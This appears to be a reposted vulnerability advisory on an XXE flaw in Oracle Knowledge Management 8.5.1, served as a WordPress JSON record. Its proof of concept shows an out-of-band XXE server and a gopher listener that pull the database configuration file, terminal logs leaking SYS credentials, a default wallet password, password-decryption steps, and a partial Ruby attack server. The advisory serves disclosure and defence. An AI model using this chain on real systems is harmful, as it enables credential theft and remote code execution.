{"id":7034,"date":"2017-03-19T14:19:48","date_gmt":"2017-03-19T22:19:48","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/19\/news-825\/"},"modified":"2017-03-19T14:19:48","modified_gmt":"2017-03-19T22:19:48","slug":"news-825","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/19\/news-825\/","title":{"rendered":"SSD Advisory \u2013 Oracle Knowledge Management XXE Leading to a RCE"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Sun, 19 Mar 2017 08:05:05 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1.<\/p>\n<p>By enabling searches across a wide variety of sources, Oracle&#8217;s InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content.<\/p>\n<p>Oracle&#8217;s products for knowledge management help users find useful knowledge contained in corporate information stores.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Oracle has released patches to address this vulnerability, for more details see: <a href=\"http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujul2016-2881720.html\" target=\"_blank\">http:\/\/www.oracle.com\/technetwork\/security-advisory\/cpujul2016-2881720.html<\/a>.<\/p>\n<p><span id=\"more-3052\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The vulnerable code can be found in <em>\/imws\/Result.jsp<\/em> which when calls, can be used to access an XML from a third-party server, this third-party server which can be under our control can be used to reference files locally present on the victim&#8217;s server.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>To exploit the vulnerability, we will run the following 5 steps (the first 2 need to be run in the background):<\/p>\n<ol>\n<li>&#8216;Malicious&#8217; XML External Entity (XXE) server<\/li>\n<li>Listener for the gopher protocol<\/li>\n<li>Attacker who steal the &#8216;custom.xml&#8217; file<\/li>\n<li>Decrypt\/crack the encrypted AES password<\/li>\n<li>Shell on the machine<\/li>\n<\/ol>\n<p>This image illustrates the steps this attack requires and the sequence of events that happen (behind the scenes):<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process.png\" data-slb-active=\"1\" data-slb-asset=\"750381566\" data-slb-internal=\"0\" data-slb-group=\"3052\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-300x176.png\" alt=\"\" width=\"300\" height=\"176\" class=\"alignnone size-medium wp-image-3054\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-300x176.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-768x450.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-1024x600.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process.png 1059w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Step 1 &#8211; setup a &#8216;malicious&#8217; XML External Entity (XXE) server:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fab150521185\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> x@pluto:~\/xxe$ ruby xxeserve.rb -o 0.0.0.0  [2015-02-09 16:03:45] INFO  WEBrick 1.3.1  [2015-02-09 16:03:45] INFO  ruby 1.9.3 (2013-11-22) [x86_64-linux]  == Sinatra\/1.4.5 has taken the stage on 4567 for development with backup from WEBrick  [2015-02-09 16:03:45] INFO  WEBrick::HTTPServer#start: pid=18862 port=4567  172.16.77.128 &#8211; &#8211; [09\/Feb\/2015:16:04:10 +1100] &#8220;GET \/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml HTTP\/1.1&#8221; 200 173 0.0089  172.16.77.128 &#8211; &#8211; [09\/Feb\/2015:16:04:10 AEDT] &#8220;GET \/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml HTTP\/1.1&#8221; 200 173  &#8211; -&gt; \/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0051 seconds] -->  <\/p>\n<p>Step 2 &#8211; setup a listener for the gopher protocol:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fb6695969205\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> x@pluto:~\/xxe$ .\/gopher.py  starting up on 0.0.0.0 port 1337  waiting for a connection  connection from (&#8216;172.16.77.128&#8217;, 50746)  (+) The database SID is: jdbc:oracle:thin:@WIN-U94QE7O15KE:1521:IM  (+) The database username is: SYS as SYSDBA  (+) The database password is: VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fb6695969205-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fb6695969205-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fb6695969205-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fb6695969205-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fb6695969205-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fb6695969205-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fb6695969205-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fb6695969205-1\"><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">pluto<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xxe<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">gopher<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fb6695969205-2\"><span class=\"crayon-e\">starting <\/span><span class=\"crayon-e\">up <\/span><span class=\"crayon-i\">on<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0.0.0.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fb6695969205-3\"><span class=\"crayon-e\">waiting <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connection<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fb6695969205-4\"><span class=\"crayon-e\">connection <\/span><span class=\"crayon-e\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;172.16.77.128&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50746<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fb6695969205-5\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">database <\/span><span class=\"crayon-e\">SID <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jdbc<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">oracle<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">thin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">WIN<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">U94QE7O15KE<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1521<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">IM<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fb6695969205-6\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">database <\/span><span class=\"crayon-e\">username <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SYS <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">SYSDBA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fb6695969205-7\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">database <\/span><span class=\"crayon-e\">password <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VO4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">OdJq<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>Step 3 &#8211; steal the &#8216;custom.xml&#8217; file<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fb9103872398\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> x@pluto:~\/xxe$ .\/poc.py   (+) pulling custom.xml for the db password&#8230;  (!) Success! please check the gopher.py window!<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fb9103872398-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fb9103872398-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fb9103872398-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fb9103872398-1\"><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">pluto<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xxe<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">poc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fb9103872398-2\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pulling <\/span><span class=\"crayon-v\">custom<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">db <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fb9103872398-3\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Success<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">please <\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">gopher<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-o\">!<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>Step 4 &#8211; decrypt\/crack the encrypted AES password:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fbc302081358\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> NOTE: you will need to bruteforce the encryption key which is contained in the wallet.  Oracle Knowledge uses &#8216;OracleKnowledge1&#8217; as the wallet\/keystore password, but you will most likely not have the wallet or keystore in which case a dictionary attack is to be used to find the password.    x@pluto:~\/xxe$ .\/decrypt.sh VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=  (+) Decrypting&#8230; &#8220;VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=&#8221;  Result: &#8220;password&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbc302081358-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbc302081358-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbc302081358-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbc302081358-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbc302081358-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbc302081358-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbc302081358-1\"><span class=\"crayon-v\">NOTE<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">you <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-e\">need <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bruteforce <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">encryption <\/span><span class=\"crayon-e\">key <\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">contained <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">wallet<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbc302081358-2\"><span class=\"crayon-e\">Oracle <\/span><span class=\"crayon-e\">Knowledge <\/span><span class=\"crayon-i\">uses<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;OracleKnowledge1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">wallet<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">keystore <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">but <\/span><span class=\"crayon-e\">you <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-e\">most <\/span><span class=\"crayon-e\">likely <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">have <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">wallet <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">keystore <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dictionary <\/span><span class=\"crayon-e\">attack <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">used <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">find <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbc302081358-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbc302081358-4\"><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">pluto<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xxe<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">decrypt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sh <\/span><span class=\"crayon-v\">VO4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">OdJq<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbc302081358-5\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Decrypting<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbc302081358-6\"><span class=\"crayon-v\">Result<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>Step 5 &#8211; get a shell<br \/> Using the database information, login to the database remotely and execute code. You may also find another configuration file on the system that will allow you a more &#8216;direct&#8217; way to obtain a SYSTEM shell.<\/p>\n<p><strong>xxeserve.rb<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fbf386262268\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env ruby  # Notes:  # &#8211; This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol  # &#8211; ruby xxeserve.rb -o 0.0.0.0    require &#8216;sinatra&#8217;    get &#8220;\/&#8221; do    return &#8220;OHAI&#8221; if 